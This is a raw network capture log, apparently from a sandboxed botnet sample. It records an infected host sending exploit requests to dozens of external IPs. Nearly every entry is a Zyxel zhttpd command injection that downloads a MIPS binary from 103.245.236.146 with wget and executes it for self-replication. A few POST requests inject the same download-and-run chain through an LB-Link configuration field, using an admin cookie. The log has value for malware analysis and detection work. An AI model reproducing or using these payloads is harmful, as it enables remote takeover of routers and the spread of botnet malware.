                                                Jan 28, 2024 10:16:30.896795034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5924192.168.2.235302832.61.167.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.899050951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5925192.168.2.234729296.100.88.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.899077892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5926192.168.2.2341946101.41.105.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.899085045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5927192.168.2.2343526139.180.233.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.899503946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5928192.168.2.2341500175.253.199.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.899533033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5929192.168.2.233672893.167.22.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.899578094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5930192.168.2.233331697.95.95.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.899586916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5931192.168.2.233547064.119.46.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.899610043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5932192.168.2.234012841.246.170.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.899647951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5933192.168.2.235492419.255.210.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.899667025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5934192.168.2.2345510192.17.246.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.899688005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5935192.168.2.234937474.72.253.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.899699926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5936192.168.2.2343924160.198.9.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.899725914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5937192.168.2.23459865.208.195.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.899769068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5938192.168.2.2336076156.87.132.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.899804115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5939192.168.2.2346626144.98.4.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.899815083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5940192.168.2.235489289.61.136.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.899837971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5941192.168.2.235788649.5.98.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.899873972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5942192.168.2.235317063.244.168.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.899890900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5943192.168.2.234170213.124.179.1548080
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.492883921 CET245OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                Jan 28, 2024 10:16:31.788844109 CET602INHTTP/1.1 400
                                                Content-Type: text/html;charset=utf-8
                                                Content-Language: en
                                                Content-Length: 435
                                                Date: Sun, 28 Jan 2024 09:16:31 GMT
                                                Connection: close
                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 30 20 e2 80 93 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 30 20 e2 80 93 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 400 Bad Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 Bad Request</h1></body></html>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5944192.168.2.2354950121.122.78.268080
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.582009077 CET245OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5945192.168.2.233772299.60.97.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.905920982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5946192.168.2.2334790204.153.48.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.905941010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5947192.168.2.236075068.122.108.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.905973911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5948192.168.2.233536832.23.51.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.906002045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5949192.168.2.2342852210.229.227.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.906024933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5950192.168.2.2348826209.31.5.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.906056881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5951192.168.2.2346146222.0.119.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.906080961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5952192.168.2.233495643.98.102.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.906122923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5953192.168.2.233553647.95.220.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.906162977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5954192.168.2.235655285.223.214.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.906179905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5955192.168.2.234199042.251.80.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.906193018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5956192.168.2.234027463.66.6.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.906219959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5957192.168.2.235990614.159.60.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.906241894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5958192.168.2.233467492.56.202.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.906275988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5959192.168.2.2355880136.111.175.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.906292915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5960192.168.2.2348538109.148.21.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.906328917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5961192.168.2.2350128202.189.120.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.906364918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5962192.168.2.235556619.223.46.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.906389952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5963192.168.2.235311217.33.180.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.906411886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5964192.168.2.2333744210.29.45.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.906426907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5965192.168.2.23543209.20.117.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.906451941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5966192.168.2.2348964152.181.78.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.906487942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5967192.168.2.235212070.102.11.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.906510115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5968192.168.2.2355838142.223.84.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.906523943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5969192.168.2.233681496.173.93.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.906565905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5970192.168.2.23601329.200.255.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.906570911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5971192.168.2.2335538187.12.177.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.906598091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5972192.168.2.2352484201.35.36.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.906627893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5973192.168.2.2358320103.102.59.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.906650066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5974192.168.2.235885659.235.92.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.906665087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5975192.168.2.2337176140.167.16.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.906687975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5976192.168.2.235409865.184.185.176443
                                                TimestampBytes transferredDirectionData
